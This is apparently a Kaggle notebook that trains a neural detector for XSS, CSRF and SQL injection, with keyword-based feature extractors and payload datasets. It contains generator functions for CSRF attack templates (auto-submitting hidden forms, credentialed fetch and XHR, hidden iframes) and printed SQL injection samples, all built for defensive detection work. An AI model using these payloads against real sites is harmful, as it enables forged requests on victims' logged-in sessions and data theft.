In [4]:
!pip install pandas numpy tensorflow tensorflow_hub tensorflow_text gensim scikit-learn beautifulsoup4 fastapi pyngrok nest_asyncio imbalanced-learn

In [5]:
!pip install --upgrade scikit-learn imbalanced-learn

In [3]:
import re
import warnings
import numpy as np
import pandas as pd
from bs4 import BeautifulSoup
from gensim.models import KeyedVectors
import tensorflow_hub as hub
import tensorflow_text  # Required for the USE model to work
from tensorflow import keras
from tensorflow.keras import layers
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score, classification_report
from http.server import BaseHTTPRequestHandler
from io import BytesIO
from urllib.parse import urlparse, parse_qs
from fastapi import FastAPI, Request
from pyngrok import ngrok
import joblib
import uvicorn
import threading
import nest_asyncio
import asyncio
import random
from urllib.parse import urlencode
import json
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import DataLoader, TensorDataset
from sklearn.utils.class_weight import compute_class_weight
import torch.nn.functional as F

warnings.filterwarnings('ignore')
nest_asyncio.apply()

2025-08-26 04:12:30.435641: E external/local_xla/xla/stream_executor/cuda/cuda_fft.cc:477] Unable to register cuFFT factory: Attempting to register factory for plugin cuFFT when one has already been registered
E0000 00:00:1756181550.619944      36 cuda_dnn.cc:8310] Unable to register cuDNN factory: Attempting to register factory for plugin cuDNN when one has already been registered
E0000 00:00:1756181550.674897      36 cuda_blas.cc:1418] Unable to register cuBLAS factory: Attempting to register factory for plugin cuBLAS when one has already been registered


In [4]:
from kaggle_secrets import UserSecretsClient
user_secrets = UserSecretsClient()

In [5]:
print("Loading pre-trained models...")

GLOVE_PATH = "/kaggle/input/nlp-models/tensorflow2/default/1/glove.word2vec"
FASTTEXT_PATH = "/kaggle/input/nlp-models/tensorflow2/default/1/fasttext.model"
USE_PATH = "/kaggle/input/nlp-models/tensorflow2/default/1/universal_sentence_encoder"

word2vec_model = KeyedVectors.load_word2vec_format(GLOVE_PATH, binary=False)
WORD2VEC_DIM = 100
fasttext_model = KeyedVectors.load(FASTTEXT_PATH)
FASTTEXT_DIM = 300
use_model = hub.load(USE_PATH)
USE_DIM = 512
print("✅ Models loaded successfully.")

Loading pre-trained models...


I0000 00:00:1756181600.711157      36 gpu_device.cc:2022] Created device /job:localhost/replica:0/task:0/device:GPU:0 with 13942 MB memory:  -> device: 0, name: Tesla T4, pci bus id: 0000:00:04.0, compute capability: 7.5
I0000 00:00:1756181600.711854      36 gpu_device.cc:2022] Created device /job:localhost/replica:0/task:0/device:GPU:1 with 13942 MB memory:  -> device: 1, name: Tesla T4, pci bus id: 0000:00:05.0, compute capability: 7.5


✅ Models loaded successfully.


In [25]:
XSS_RULE_BASED_SIZE = 68
CSRF_RULE_BASED_SIZE = 52
SQLI_RULE_BASED_SIZE = 39
XSS_VECTOR_SIZE = XSS_RULE_BASED_SIZE + WORD2VEC_DIM + FASTTEXT_DIM + USE_DIM
CSRF_VECTOR_SIZE = CSRF_RULE_BASED_SIZE + WORD2VEC_DIM + FASTTEXT_DIM + USE_DIM
SQLI_VECTOR_SIZE = SQLI_RULE_BASED_SIZE + WORD2VEC_DIM + FASTTEXT_DIM + USE_DIM
INPUT_SIZE=XSS_RULE_BASED_SIZE+CSRF_RULE_BASED_SIZE+SQLI_RULE_BASED_SIZE+WORD2VEC_DIM + FASTTEXT_DIM + USE_DIM

In [1]:
print(INPUT_SIZE)

NameError: name 'INPUT_SIZE' is not defined

In [8]:
def get_word_embedding(payload, model, dim):
    tokens = payload.lower().split()
    vectors = [model[word] for word in tokens if word in model.key_to_index]
    return np.mean(vectors, axis=0) if vectors else np.zeros(dim)

def get_sentence_embedding(payload, model):
    return model([payload]).numpy().flatten()

def extract_uniembed_features(payload):
    """Extracts a combined NLP feature vector from the payload."""
    cleaned = re.sub(r'<[^>]+>', ' ', payload).strip()
    w2v = get_word_embedding(cleaned, word2vec_model, WORD2VEC_DIM)
    ft = get_word_embedding(cleaned, fasttext_model, FASTTEXT_DIM)
    use = get_sentence_embedding(payload, use_model)
    return np.hstack([w2v, ft, use])

In [9]:
def extract_xss_68_features(payload):
    """
    Extracts all 66 specified features from a raw payload string.

    UPDATED: This function now processes the payload directly. It uses BeautifulSoup
    to find HTML structures if they exist, and simultaneously uses the raw
    string for content-based checks. This makes it robust for non-HTML payloads.
    """
    features = {}

    # --- Pre-processing ---
    # The raw payload is used for both parsing and direct string analysis.
    html_content = payload
    try:
      soup = BeautifulSoup(html_content, 'html.parser')
      features['malformed']=0
    except Exception as e:
      soup = BeautifulSoup('', 'html.parser')
      features['malformed']=1

    js_code = "".join(script.get_text(strip=True) for script in soup.find_all('script'))

    # Attempt to find a URL within the payload, otherwise use a default
    url_match = re.search(r'https?://[^\s\'"]+', html_content)
    url = url_match.group(0) if url_match else 'http://example.com'
    parsed_url = urlparse(url)

    # Category 1: URL Features
    features['url_length'] = len(url)
    features['url_special_characters'] = len(re.findall(r'[^a-zA-Z0-9]', url))
    features['url_tag_script'] = 1 if re.search(r'<script', url, re.IGNORECASE) else 0
    features['url_tag_iframe'] = 1 if re.search(r'<iframe', url, re.IGNORECASE) else 0
    features['url_attr_src'] = 1 if re.search(r'src=', url, re.IGNORECASE) else 0
    features['url_event_onload'] = 1 if re.search(r'onload=', url, re.IGNORECASE) else 0
    features['url_event_onmouseover'] = 1 if re.search(r'onmouseover=', url, re.IGNORECASE) else 0
    features['url_cookie'] = 1 if 'cookie' in url.lower() else 0
    features['url_number_keywords_param'] = len(re.findall(r'(alert|script|onerror|onload|eval)', parsed_url.query, re.IGNORECASE))
    features['url_number_domain'] = len(parsed_url.hostname.split('.')) if parsed_url.hostname else 0

    # Category 2: HTML Tag Features (from parsed payload)
    tags = ['script', 'iframe', 'meta', 'object', 'embed', 'link', 'svg', 'frame', 'form', 'div', 'style', 'img', 'input', 'textarea']
    for tag in tags:
        features[f'html_tag_{tag}'] = len(soup.find_all(tag))

    # Category 3: HTML Attribute Features (from parsed payload)
    attrs = ['action', 'background', 'classid', 'codebase', 'href', 'longdesc', 'profile', 'src', 'usemap']
    for attr in attrs:
        features[f'html_attr_{attr}'] = len(soup.find_all(attrs={attr: True}))
    features['html_attr_http-equiv'] = len(soup.find_all(attrs={'http-equiv': True}))

    # Category 4: HTML Event Handler Features (from parsed payload)
    events = ['onblur', 'onchange', 'onclick', 'onerror', 'onfocus', 'onkeydown', 'onkeypress', 'onkeyup', 'onload', 'onmousedown', 'onmouseout', 'onmouseover', 'onmouseup', 'onsubmit']
    for event in events:
        features[f'html_event_{event}'] = len(soup.find_all(attrs={event: True}))

    # Category 5: JavaScript & Content Features (from raw payload and extracted JS)
    evil_keywords = ['eval', 'alert', 'prompt', 'confirm', 'document.cookie', 'window.location', 'unescape']
    features['html_number_keywords_evil'] = sum(html_content.lower().count(kw) for kw in evil_keywords)
    features['js_file'] = len(soup.find_all('script', src=True))
    features['js_pseudo_protocol'] = len(re.findall(r'javascript:', html_content, re.IGNORECASE))
    features['js_dom_location'] = js_code.lower().count('location')
    features['js_dom_document'] = js_code.lower().count('document')
    features['js_prop_cookie'] = js_code.lower().count('.cookie')
    features['js_prop_referrer'] = js_code.lower().count('.referrer')

    js_methods = ['write', 'getElementsByTagName', 'getElementById', 'alert', 'eval', 'fromCharCode', 'confirm']
    for method in js_methods:
        features[f'js_method_{method}'] = len(re.findall(rf'[\b\.]({method})\s*\(', js_code, re.IGNORECASE))

    features['js_min_length'] = len(js_code)
    features['js_min_define_function'] = len(re.findall(r'function\s*[\w]*\s*\(', js_code))
    total_calls = len(re.findall(r'\w+\s*\(', js_code))
    features['js_min_function_calls'] = max(0, total_calls - features['js_min_define_function'])
    js_strings = re.findall(r'["\'](.*?)["\']', js_code)
    features['js_string_max_length'] = max(len(s) for s in js_strings) if js_strings else 0

    # Category 6: Final General Feature
    features['html_length'] = len(html_content)

    # Return as a numpy array in a consistent order
    feature_order = sorted(features.keys())
    return np.array([features[k] for k in feature_order])

In [10]:
def extract_rule_based_csrf_features(payload: str) -> np.ndarray:
    # This is your provided function for CSRF rule-based features
    feature_names=[
        'numOfParams', 'numOfBools', 'numOfIds', 'numOfBlobs', 'reqLen', 'createInPath', 'createInParams', 'addInPath', 'addInParams', 'setInPath', 'setInParams', 'deleteInPath', 'deleteInParams', 'updateInPath', 'updateInParams', 'removeInPath', 'removeInParams', 'friendInPath', 'friendInParams', 'settingInPath', 'settingInParams', 'passwordInPath', 'passwordInParams', 'tokenInPath', 'tokenInParams', 'changeInPath', 'changeInParams', 'actionInPath', 'actionInParams', 'payInPath', 'payInParams', 'loginInPath', 'loginInParams', 'logoutInPath', 'logoutInParams', 'postInPath', 'postInParams', 'commentInPath', 'commentInParams', 'followInPath', 'followInParams', 'subscribeInPath', 'subscribeInParams', 'signInPath', 'signInParams', 'viewInPath', 'viewInParams', 'isPUT', 'isDELETE', 'isPOST', 'isGET', 'isOPTIONS'
    ]
    keywords=[
        'create', 'add', 'set', 'delete', 'update', 'remove', 'friend', 'setting', 'password', 'token', 'change', 'action', 'pay', 'login', 'logout', 'post', 'comment', 'follow', 'subscribe', 'sign', 'view'
    ]
    features = {name: 0 for name in feature_names}
    payload_lower = payload.lower()
    features['reqLen'] = len(payload)
    url_match = re.search(r'https?://[^\'\"`\s<>]+', payload)
    path = ""
    all_params = {}
    if url_match:
        url = url_match.group(0)
        parsed_url = urlparse(url)
        path = parsed_url.path.lower()
        all_params.update(parse_qs(parsed_url.query))
    form_param_match = re.search(r"send\('([^']+)'\)", payload)
    if form_param_match:
        all_params.update(parse_qs(form_param_match.group(1)))
    form_inputs = re.findall(r"<input[^>]+name=['\"]([^'\"]+)['\"][^>]+value=['\"]([^'\"]+)['\"]", payload)
    for name, value in form_inputs:
        if name not in all_params:
            all_params[name] = []
        all_params[name].append(value)
    features['numOfParams'] = len(all_params)
    for key, values in all_params.items():
        if 'id' in key.lower():
            features['numOfIds'] += 1
        for value in values:
            if value.lower() in ['true', 'false', '1', '0', 'yes', 'no']:
                features['numOfBools'] += 1
    features['numOfBlobs'] = 0
    params_str = str(all_params.keys()).lower()
    for keyword in keywords:
        if keyword in path:
            features[f'{keyword}InPath'] = 1
        if keyword in params_str:
            features[f'{keyword}InParams'] = 1
    if 'method' in payload_lower and 'post' in payload_lower or "xhr.open('post'" in payload_lower:
        features['isPOST'] = 1
    elif 'method' in payload_lower and 'put' in payload_lower or "xhr.open('put'" in payload_lower:
        features['isPUT'] = 1
    elif 'method' in payload_lower and 'delete' in payload_lower or "xhr.open('delete'" in payload_lower:
        features['isDELETE'] = 1
    elif 'method' in payload_lower and 'options' in payload_lower or "xhr.open('options'" in payload_lower:
        features['isOPTIONS'] = 1
    else:
        features['isGET'] = 1
    return np.array([features[name] for name in feature_names])

In [11]:
def extract_sqli_features(payload: str) -> np.ndarray:
    """
    Extracts rule-based features for SQL Injection detection from a payload.
    """
    features = []
    payload_lower = payload.lower()

    # 1. SQL Keywords
    sql_keywords = [
        'select', 'union', 'insert', 'update', 'delete', 'drop', 'from',
        'where', 'and', 'or', 'limit', 'order by', 'group by', 'exec',
        'declare', 'cast', 'convert', 'sleep', 'benchmark', 'waitfor'
    ]
    features.extend([payload_lower.count(kw) for kw in sql_keywords])

    # 2. SQL Comment Characters
    features.append(payload.count('--'))
    features.append(payload.count('#'))
    features.append(payload.count('/*'))
    features.append(payload.count('*/'))

    # 3. Tautologies and Common Bypass Patterns
    tautologies = ["1=1", "'='", "or 1=1", "or '1'='1'"]
    features.extend([payload_lower.count(t) for t in tautologies])

    # 4. Special Characters and Operators
    special_chars = ['=', "'", "\"", ";", "(", ")"]
    features.extend([payload.count(char) for char in special_chars])

    # 5. Hex Encoded Characters
    features.append(len(re.findall(r'%[0-9a-f]{2}', payload_lower)))

    # 6. Overall Payload Length
    features.append(len(payload))

    # 7. Whitespace characters (often used for obfuscation)
    features.append(len(re.findall(r'\\s', payload)))

    return np.array(features, dtype=np.float32)


In [12]:
def create_unified_feature_vector(row):
    """
    Creates a single feature vector that includes slots for both XSS and CSRF
    rule-based features, plus the common NLP features.
    """
    payload = row['payload']
    label = row['class']
    
    nlp_features = extract_uniembed_features(payload)
    xss_rules = extract_xss_68_features(payload)
    csrf_rules = extract_rule_based_csrf_features(payload)
    sqli_rules = extract_sqli_features(payload)
        
    return np.hstack([xss_rules, csrf_rules, sqli_rules, nlp_features])

In [13]:
xss_dataset_path = '/kaggle/input/combined-dataset/payloads.csv'
xss_df = pd.read_csv(xss_dataset_path)
print("\n🔬 Extracting features from all xss payloads...")

xss_features_df=pd.DataFrame({
    'features': xss_df.apply(create_unified_feature_vector, axis=1),
    'class': xss_df['class']
})
print("✅ Hybrid feature extraction complete for xss.")


🔬 Extracting features from all xss payloads...
✅ Hybrid feature extraction complete for xss.


In [14]:
print(xss_features_df)
total_na_values = xss_features_df.isna().sum()
print(f"Total NA values in the DataFrame: {total_na_values}")

                                                features  class
0      [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, ...      1
1      [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, ...      1
2      [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, ...      1
3      [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, ...      1
4      [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, ...      1
...                                                  ...    ...
63944  [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, ...      1
63945  [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, ...      1
63946  [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, ...      1
63947  [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, ...      1
63948  [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, ...      1

[63949 rows x 2 columns]
Total NA values in the DataFrame: features    0
class       0
dtype: int64


In [15]:
def _create_form_payload(url, params):
    """Generates a payload with an auto-submitting hidden form."""
    form_id = f"csrfForm_{random.randint(1000, 9999)}"
    inputs_html = ""
    for key, values in params.items():
        for value in values:
            # Basic escaping for values to handle quotes in the payload
            value_escaped = str(value).replace('"', '&quot;')
            inputs_html += f'<input type="hidden" name="{key}" value="{value_escaped}">'
    return (
        f'<form action="{url}" method="POST" id="{form_id}">{inputs_html}</form>'
        f'<script>document.getElementById("{form_id}").submit();</script>'
    )

def _create_xhr_payload(url, params):
    """Generates a payload using XMLHttpRequest."""
    body = urlencode(params, doseq=True)
    return (
        f"<script>"
        f"var xhr=new XMLHttpRequest();"
        f"xhr.open('POST','{url}',true);"
        f"xhr.withCredentials=true;"
        f"xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');"
        f"xhr.send('{body}');"
        f"</script>"
    )

def _create_fetch_payload(url, params):
    """Generates a payload using the fetch API."""
    body = urlencode(params, doseq=True)
    return (
        f"<script>"
        f"fetch('{url}', {{"
        f"method:'POST',"
        f"credentials:'include',"
        f"body:'{body}'"
        f"}});"
        f"</script>"
    )

def _create_iframe_srcdoc_payload(url, params):
    """Generates a payload using a hidden iframe with an auto-submitting form."""
    form_html = _create_form_payload(url, params).replace('"', '&quot;')
    return f'<iframe style="display:none" srcdoc="{form_html}"></iframe>'

def _create_beacon_payload(url, params):
    """Generates a payload using navigator.sendBeacon."""
    body = urlencode(params, doseq=True)
    return f"<script>navigator.sendBeacon('{url}', '{body}');</script>"

# --- Original GET Payload Functions ---

def _create_img_payload(url, params):
    """Generates a payload using a hidden image tag."""
    query_string = urlencode(params, doseq=True)
    full_url = f"{url}?{query_string}" if params else url
    return f'<img src="{full_url}" style="display:none;" />'

def _create_meta_refresh_payload(url, params):
    """Generates a payload using a meta refresh tag."""
    query_string = urlencode(params, doseq=True)
    full_url = f"{url}?{query_string}" if params else url
    return f'<meta http-equiv="refresh" content="0;url={full_url}" />'

# --- New Additional GET Payload Functions ---

def _create_link_payload(url, params):
    """Generates a payload using a <link> tag (e.g., for prefetching)."""
    query_string = urlencode(params, doseq=True)
    full_url = f"{url}?{query_string}" if params else url
    return f'<link rel="dns-prefetch" href="{full_url}">'

def _create_script_src_payload(url, params):
    """Generates a payload using a <script> tag's src attribute."""
    query_string = urlencode(params, doseq=True)
    full_url = f"{url}?{query_string}" if params else url
    return f'<script src="{full_url}"></script>'

def _create_iframe_src_payload(url, params):
    """Generates a payload using an <iframe> tag's src attribute."""
    query_string = urlencode(params, doseq=True)
    full_url = f"{url}?{query_string}" if params else url
    return f'<iframe src="{full_url}" style="display:none;"></iframe>'

def _create_background_url_payload(url, params):
    """Generates a payload using a CSS background-image property."""
    query_string = urlencode(params, doseq=True)
    full_url = f"{url}?{query_string}" if params else url
    return f'<div style="background:url({full_url})"></div>'

def _create_xhr_get_payload(url, params):
    """Generates a GET payload using XMLHttpRequest."""
    query_string = urlencode(params, doseq=True)
    full_url = f"{url}?{query_string}" if params else url
    return (
        f"<script>"
        f"var xhr=new XMLHttpRequest();"
        f"xhr.open('GET','{full_url}',true);"
        f"xhr.withCredentials=true;"
        f"xhr.send(null);"
        f"</script>"
    )

def _create_fetch_get_payload(url, params):
    """Generates a GET payload using the fetch API."""
    query_string = urlencode(params, doseq=True)
    full_url = f"{url}?{query_string}" if params else url
    return (
        f"<script>"
        f"fetch('{full_url}', {{method:'GET', credentials:'include'}});"
        f"</script>"
    )

def _create_object_data_payload(url, params):
    """Generates a payload using an <object> tag's data attribute."""
    query_string = urlencode(params, doseq=True)
    full_url = f"{url}?{query_string}" if params else url
    return f'<object data="{full_url}" style="display:none;"></object>'

# --- New Additional POST Payload Functions ---

def _create_form_enctype_plain_payload(url, params):
    """Generates a form payload with 'text/plain' encoding."""
    form_id = f"csrfForm_{random.randint(1000, 9999)}"
    inputs_html = ""
    for key, values in params.items():
        for value in values:
            value_escaped = str(value).replace('"', '&quot;')
            inputs_html += f'<input type="hidden" name="{key}" value="{value_escaped}">'
    return (
        f'<form action="{url}" method="POST" id="{form_id}" enctype="text/plain">{inputs_html}</form>'
        f'<script>document.getElementById("{form_id}").submit();</script>'
    )

def _create_form_enctype_multipart_payload(url, params):
    """Generates a form payload with 'multipart/form-data' encoding."""
    form_id = f"csrfForm_{random.randint(1000, 9999)}"
    inputs_html = ""
    for key, values in params.items():
        for value in values:
            value_escaped = str(value).replace('"', '&quot;')
            inputs_html += f'<input type="hidden" name="{key}" value="{value_escaped}">'
    return (
        f'<form action="{url}" method="POST" id="{form_id}" enctype="multipart/form-data">{inputs_html}</form>'
        f'<script>document.getElementById("{form_id}").submit();</script>'
    )

# --- Updated Main Generator Function ---

def generate_all_payload_variations(request_data: dict) -> list:
    """
    Converts a single raw request object into a list containing all possible
    browser-executable HTML/JS payload variations.
    """
    method = request_data.get('method', 'GET').upper()
    url = request_data.get('url', '')
    params = request_data.get('params', {})
    generated_payloads = []

    if method == 'POST':
        post_generators = [
            _create_form_payload, _create_xhr_payload, _create_fetch_payload,
            _create_iframe_srcdoc_payload, _create_beacon_payload,
            _create_form_enctype_plain_payload, _create_form_enctype_multipart_payload
        ]
        for generator in post_generators:
            generated_payloads.append(generator(url, params))

    elif method == 'GET':
        get_generators = [
            _create_img_payload, _create_meta_refresh_payload,
            _create_link_payload, _create_script_src_payload,
            _create_iframe_src_payload, _create_background_url_payload,
            _create_xhr_get_payload, _create_fetch_get_payload,
            _create_object_data_payload
        ]
        for generator in get_generators:
            generated_payloads.append(generator(url, params))
    
    return generated_payloads

def create_payload_dataframe_from_json(json_file_path: str) -> pd.DataFrame:
    """
    Reads the nested JSON file, generates all possible executable payload variations
    for each request, and returns them as a pandas DataFrame.
    """
    print(f"Reading JSON data from: {json_file_path}")
    
    try:
        with open(json_file_path, 'r', encoding='utf-8') as json_file:
            data = json.load(json_file)
    except (json.JSONDecodeError, FileNotFoundError) as e:
        print(f"Error reading JSON file: {e}")
        return pd.DataFrame()

    if not isinstance(data, list):
        print("Error: JSON root must be a list.")
        return pd.DataFrame()

    all_payloads_with_flags = []
    
    for website_data in data:
        if 'data' in website_data and isinstance(website_data['data'], list):
            for request_item in website_data['data']:
                if 'req' in request_item:
                    flag = 1 if request_item.get('flag') == 'y' else 0
                    payload_variations = generate_all_payload_variations(request_item['req'])
                    for payload in payload_variations:
                        if payload:
                            all_payloads_with_flags.append([payload, flag])

    print(f"Generated {len(all_payloads_with_flags)} total payloads from all variations.")
    
    # Create DataFrame directly from the list
    df = pd.DataFrame(all_payloads_with_flags, columns=['payload', 'class'])
    return df

input_json = '/kaggle/input/combined-dataset/dataset.json'

# Generate the DataFrame
csrf_df = create_payload_dataframe_from_json(input_json)

if not csrf_df.empty:
    print(f"\n✅ Successfully created DataFrame with shape: {csrf_df.shape}")
    print("\n--- DataFrame Head ---")
    print(csrf_df.head())
    print("\n--- DataFrame Tail ---")
    print(csrf_df.tail())
    print("\n--- Flag Distribution ---")
    print(csrf_df['class'].value_counts())

Reading JSON data from: /kaggle/input/combined-dataset/dataset.json
Generated 48868 total payloads from all variations.

✅ Successfully created DataFrame with shape: (48868, 2)

--- DataFrame Head ---
                                             payload  class
0  <img src="http://9gag.com/" style="display:non...      0
1  <meta http-equiv="refresh" content="0;url=http...      0
2  <link rel="dns-prefetch" href="http://9gag.com/">      0
3           <script src="http://9gag.com/"></script>      0
4  <iframe src="http://9gag.com/" style="display:...      0

--- DataFrame Tail ---
                                                 payload  class
48863  <iframe src="https://it.youporn.com/channels/m...      0
48864  <div style="background:url(https://it.youporn....      0
48865  <script>var xhr=new XMLHttpRequest();xhr.open(...      0
48866  <script>fetch('https://it.youporn.com/channels...      0
48867  <object data="https://it.youporn.com/channels/...      0

--- Flag Distribution ---
clas

In [16]:
print("\n🔬 Extracting features from all csrf payloads...")

csrf_features = csrf_df.apply(create_unified_feature_vector, axis=1)
csrf_labels = csrf_df['class']

csrf_features_df = pd.DataFrame({
    'features': csrf_features,
    'class': csrf_labels.replace(1, 2)
})
print("Feature extraction completed for all csrf payloads.")


🔬 Extracting features from all csrf payloads...
Feature extraction completed for all csrf payloads.


In [17]:
print(csrf_features_df)
total_na_values = csrf_features_df.isna().sum()
print(f"Total NA values in the DataFrame: {total_na_values}")
# clean_csrf_features_df = csrf_features_df.dropna(axis=0)

                                                features  class
0      [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, ...      0
1      [0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, ...      0
2      [0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, ...      0
3      [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, ...      0
4      [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, ...      0
...                                                  ...    ...
48863  [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, ...      0
48864  [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, ...      0
48865  [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, ...      0
48866  [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, ...      0
48867  [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, ...      0

[48868 rows x 2 columns]
Total NA values in the DataFrame: features    0
class       0
dtype: int64


In [18]:
print("\n🔬 Loading all SQLi payloads...")
sqli_dataset_path = '/kaggle/input/combined-dataset/Sql-Dataset.csv'
sqli_df = pd.read_csv(sqli_dataset_path)
print(sqli_df)


🔬 Loading all SQLi payloads...
                                                 payload  class
0                      " or pg_sleep  (  __TIME__  )  --      1
1      create user name identified by pass123 tempora...      1
2       AND 1  =  utl_inaddr.get_host_address   (    ...      1
3       select * from users where id  =  '1' or @ @1 ...      1
4       select * from users where id  =  1 or 1#"  ( ...      1
...                                                  ...    ...
30914              DELETE FROM door WHERE grow = 'small'      0
30915                               DELETE FROM tomorrow      0
30916                       SELECT wide ( s )  FROM west      0
30917       SELECT * FROM  ( SELECT slide FROM breath )       0
30918                           SELECT TOP 3 * FROM race      0

[30919 rows x 2 columns]


In [19]:
print("\n🔬 Extracting features from all SQLi payloads...")
sqli_features = sqli_df.apply(create_unified_feature_vector, axis=1)
sqli_labels = sqli_df['class'].apply(lambda x: 3 if x == 1 else 0)

sqli_features_df = pd.DataFrame({
    'features': sqli_features,
    'class': sqli_labels
})

print("✅ Hybrid feature extraction complete for SQLi.")
print(f"SQLi DataFrame shape: {sqli_features_df.shape}")
print("Class distribution in SQLi dataset:")
print(sqli_features_df['class'].value_counts())


🔬 Extracting features from all SQLi payloads...
✅ Hybrid feature extraction complete for SQLi.
SQLi DataFrame shape: (30919, 2)
Class distribution in SQLi dataset:
class
0    19537
3    11382
Name: count, dtype: int64


In [20]:
df = pd.concat([xss_features_df, csrf_features_df, sqli_features_df], ignore_index=True)
print("✅ All datasets (XSS, CSRF, SQLi) combined successfully.")

df = df.sample(frac=1, random_state=42).reset_index(drop=True)

print("\\n--- Final Combined DataFrame ---")
print(df.head())
print(f"\\nShape of the final dataset: {df.shape}")
print("\\nFinal class distribution:")
print(df['class'].value_counts())

✅ All datasets (XSS, CSRF, SQLi) combined successfully.
\n--- Final Combined DataFrame ---
                                            features  class
0  [0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, ...      0
1  [1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, ...      0
2  [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, ...      0
3  [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, ...      0
4  [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, ...      0
\nShape of the final dataset: (143736, 2)
\nFinal class distribution:
class
0    96342
1    29568
3    11382
2     6444
Name: count, dtype: int64


In [21]:
print("\n🤖 Dividing the input into training and testing set...")

X = np.vstack(df['features'].values)
y = df['class'].values
y = y.astype(int)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42, stratify=y)


🤖 Dividing the input into training and testing set...


In [22]:
X_train_tensor = torch.tensor(X_train, dtype=torch.float32)
y_train_tensor = torch.tensor(y_train, dtype=torch.long)
X_test_tensor = torch.tensor(X_test, dtype=torch.float32)
y_test_tensor = torch.tensor(y_test, dtype=torch.long)
train_dataset = TensorDataset(X_train_tensor, y_train_tensor)
test_dataset = TensorDataset(X_test_tensor, y_test_tensor)

train_loader = DataLoader(dataset=train_dataset, batch_size=64, shuffle=True)
test_loader = DataLoader(dataset=test_dataset, batch_size=64, shuffle=False)

In [30]:
class MLP(nn.Module):
    def __init__(self, input_size=1032, num_classes=3):
        super(MLP, self).__init__()
        # Layer 1: 1032 input features -> 256 output features
        self.layer1 = nn.Linear(input_size, 256)
        self.relu1 = nn.ReLU()
        
        # Layer 2: 256 input features -> 128 output features
        self.layer2 = nn.Linear(256, 128)
        self.relu2 = nn.ReLU()

        # Layer 3: 128 input features -> 64 output features
        self.layer3 = nn.Linear(128, 64)
        self.relu3 = nn.ReLU()

        # Output Layer: 64 input features -> 3 output features (for 3 classes)
        self.output_layer = nn.Linear(64, num_classes)

    def forward(self, x):
        x = self.layer1(x)
        x = self.relu1(x)
        x = self.layer2(x)
        x = self.relu2(x)
        x = self.layer3(x)
        x = self.relu3(x)
        x = self.output_layer(x)
        return x

INPUT_SIZE = X_train.shape[1]
NUM_CLASSES = 4
LEARNING_RATE = 0.001
EPOCHS = 200
device = "cuda"

# Initialize model, loss function, and optimizer
mlp_model = MLP(input_size=INPUT_SIZE, num_classes=NUM_CLASSES).to(device)
class_weights = compute_class_weight(
    class_weight='balanced',
    classes=np.unique(y_train),
    y=y_train
)

weights_tensor = torch.tensor(class_weights, dtype=torch.float32).to(device)

criterion = nn.CrossEntropyLoss(weight=weights_tensor)
# FIX: Use the correct model variable 'mlp_model' here
optimizer = optim.Adam(mlp_model.parameters(), lr=LEARNING_RATE)

In [44]:
MLP_MODEL_FILENAME='/kaggle/input/xss_csrf_trained_models/other/default/2/mlp_xss_csrf_sqli_detector.joblib'
mlp_model.load_state_dict(torch.load(MLP_MODEL_FILENAME, map_location=device))

<All keys matched successfully>

In [31]:
# Training loop
for epoch in range(EPOCHS):
    mlp_model.train() # Set the model to training mode
    # Keep track of the running loss for the epoch
    running_loss = 0.0
    for batch_idx, (data, targets) in enumerate(train_loader):
        # Move data and targets to the selected device (GPU/CPU)
        data = data.to(device)
        targets = targets.to(device)
        
        # Forward pass
        scores = mlp_model(data)
        loss = criterion(scores, targets)
        
        # Backward pass and optimization
        optimizer.zero_grad() # Reset gradients
        loss.backward()       # Calculate gradients
        optimizer.step()      # Update weights

        running_loss += loss.item()
        
    # Print the average loss for the epoch
    epoch_loss = running_loss / len(train_loader)
    print(f"Epoch {epoch+1}/{EPOCHS}, Loss: {epoch_loss:.4f}")

Epoch 1/200, Loss: 0.3915
Epoch 2/200, Loss: 0.2376
Epoch 3/200, Loss: 0.2021
Epoch 4/200, Loss: 0.1829
Epoch 5/200, Loss: 0.1682
Epoch 6/200, Loss: 0.1852
Epoch 7/200, Loss: 0.1699
Epoch 8/200, Loss: 0.1578
Epoch 9/200, Loss: 0.1598
Epoch 10/200, Loss: 0.1436
Epoch 11/200, Loss: 0.1382
Epoch 12/200, Loss: 0.1542
Epoch 13/200, Loss: 0.1366
Epoch 14/200, Loss: 0.1324
Epoch 15/200, Loss: 0.1380
